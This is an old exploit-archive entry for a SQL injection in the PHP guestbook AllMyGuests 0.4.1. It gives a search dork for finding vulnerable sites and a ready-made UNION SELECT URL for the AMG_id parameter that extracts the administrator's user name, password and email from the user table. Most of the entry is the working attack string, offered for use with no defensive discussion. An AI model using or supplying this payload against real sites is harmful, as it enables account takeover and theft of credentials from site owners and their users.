AllMyGuests 0.4.1 - 'AMG_id' SQL Injection

EDB-ID:

5469


Author:

Player

Type:

webapps


Platform:

PHP

Date:

2008-04-19


########################################################
#
#  Found by : -=Player=-
#
#  Contacts : 282-246-419 (ICQ)
#
#  Greatz to: Lidloses_Auge, Suicide, enco, Free-Hack
#
########################################################
#
#  Script   : AllMyGuests
#
#  Site     : http://www.php-resource.net/
#
#  Dork        : "powered by AllMyGuests"
#
#  Valnu    : index.php
#
#  Parameter: AMG_id
#
#  Injection: index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
#  Example  : http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
########################################################

# milw0rm.com [2008-04-19]